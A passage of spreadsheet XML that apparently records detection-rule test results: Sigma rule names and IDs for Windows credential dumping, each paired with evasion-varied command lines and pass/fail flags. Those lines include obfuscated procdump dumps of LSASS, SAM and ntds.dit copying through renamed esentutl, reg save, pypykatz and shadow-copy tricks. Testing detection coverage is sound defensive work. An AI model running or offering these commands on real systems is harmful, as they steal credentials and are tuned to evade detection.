      <c r="K249" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="44" t="n"/>
      <c r="B250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C250" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D250" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E250" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -"m^a" l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I250" s="43" t="n"/>
      <c r="J250" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K250" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="44" t="n"/>
      <c r="B251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C251" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D251" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E251" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G251" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H251" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J251" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K251" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="44" t="n"/>
      <c r="B252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfault_lsass_shtinkering</t>
        </is>
      </c>
      <c r="C252" s="44" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Via WER</t>
        </is>
      </c>
      <c r="D252" s="44" t="inlineStr">
        <is>
          <t>9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3</t>
        </is>
      </c>
      <c r="E252" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\Werfault.exe "-u" "-p" 744 "-ip" 1112 "-s" 244</t>
        </is>
      </c>
      <c r="F252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I252" s="43" t="n"/>
      <c r="J252" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K252" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="44" t="n"/>
      <c r="B253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfault_lsass_shtinkering</t>
        </is>
      </c>
      <c r="C253" s="44" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Via WER</t>
        </is>
      </c>
      <c r="D253" s="44" t="inlineStr">
        <is>
          <t>9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3</t>
        </is>
      </c>
      <c r="E253" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\Werfault.exe -u  -p 744 -ip 1112 -s 244</t>
        </is>
      </c>
      <c r="F253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I253" s="43" t="n"/>
      <c r="J253" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K253" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="44" t="n"/>
      <c r="B254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfault_lsass_shtinkering</t>
        </is>
      </c>
      <c r="C254" s="44" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Via WER</t>
        </is>
      </c>
      <c r="D254" s="44" t="inlineStr">
        <is>
          <t>9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3</t>
        </is>
      </c>
      <c r="E254" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244</t>
        </is>
      </c>
      <c r="F254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I254" s="43" t="n"/>
      <c r="J254" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K254" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C255" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D255" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E255" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I255" s="44" t="n"/>
      <c r="J255" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K255" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C256" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D256" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E256" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I256" s="43" t="n"/>
      <c r="J256" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K256" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C257" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D257" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E257" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I257" s="43" t="n"/>
      <c r="J257" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K257" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C258" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D258" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E258" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe /"y" C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="4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58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C259" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D259" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E259" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe /Y C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H259" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I259" s="4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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C260" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D260" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E260" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe C:\temp\backup_tool.exe &amp;&amp; C:\temp\backup_tool.exe -"y" C:\Windows\System32\config\SAM C:\temp\SAM.bak</t>
        </is>
      </c>
      <c r="F260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H260" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="44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60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="n"/>
      <c r="B261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C261" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D261" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E261" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/y" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I261" s="44" t="n"/>
      <c r="J261" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="n"/>
      <c r="B262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C262" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D262" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E262" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/Y" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I262" s="43" t="n"/>
      <c r="J262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="n"/>
      <c r="B263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C263" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D263" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E263" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/y"" C:\Windows\System32\config\.\sam C:\temp\sam.bak</t>
        </is>
      </c>
      <c r="F263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I263" s="43" t="n"/>
      <c r="J263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="n"/>
      <c r="B264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_pypykatz</t>
        </is>
      </c>
      <c r="C264" s="44" t="inlineStr">
        <is>
          <t>HackTool - Pypykatz Credentials Dumping Activity</t>
        </is>
      </c>
      <c r="D264" s="44" t="inlineStr">
        <is>
          <t>a29808fd-ef50-49ff-9c7a-59a9b040b404</t>
        </is>
      </c>
      <c r="E264" s="44" t="inlineStr">
        <is>
          <t>copy C:\Python39\python.exe C:\temp\sys_runner.exe &amp;&amp; C:\temp\sys_runner.exe -m pypykatz live registry</t>
        </is>
      </c>
      <c r="F264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I264" s="43" t="n"/>
      <c r="J264" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K264" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="n"/>
      <c r="B265" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C265" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D265" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E265" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J265" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="n"/>
      <c r="B266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C266" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D266" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E266" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J266" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="n"/>
      <c r="B267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C267" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D267" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E267" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="n"/>
      <c r="B268" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_dumping_sensitive_hives</t>
        </is>
      </c>
      <c r="C268" s="43" t="inlineStr">
        <is>
          <t>Dumping of Sensitive Hives Via Reg.EXE</t>
        </is>
      </c>
      <c r="D268" s="43" t="inlineStr">
        <is>
          <t>fd877b94-9bb5-4191-bb25-d79cbd93c167</t>
        </is>
      </c>
      <c r="E268" s="43" t="inlineStr">
        <is>
          <t>reg.exe "save" HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K268" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="44" t="n"/>
      <c r="B269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C269" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D269" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E269" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" wmic shadowcopy cr^eate Volume=C:\</t>
        </is>
      </c>
      <c r="F269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="44" t="n"/>
      <c r="B270" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C270" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D270" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E270" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I270" s="43" t="n"/>
      <c r="J270" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="44" t="n"/>
      <c r="B271" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C271" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D271" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E271" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="44" t="n"/>
      <c r="B272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C272" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D272" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E272" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="44" t="n"/>
      <c r="B273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C273" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D273" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E273" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I273" s="43" t="n"/>
      <c r="J273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C274" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D274" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E274" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I274" s="44" t="n"/>
      <c r="J274" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B275" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C275" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D275" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E275" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I275" s="44" t="n"/>
      <c r="J275" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B276" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C276" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D276" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E276" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I276" s="44" t="n"/>
      <c r="J276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="43" t="n"/>
      <c r="B277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C277" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D277" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E277" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe -p C:\temp\ntds.dit</t>
        </is>
      </c>
      <c r="F277" s="44" t="b">
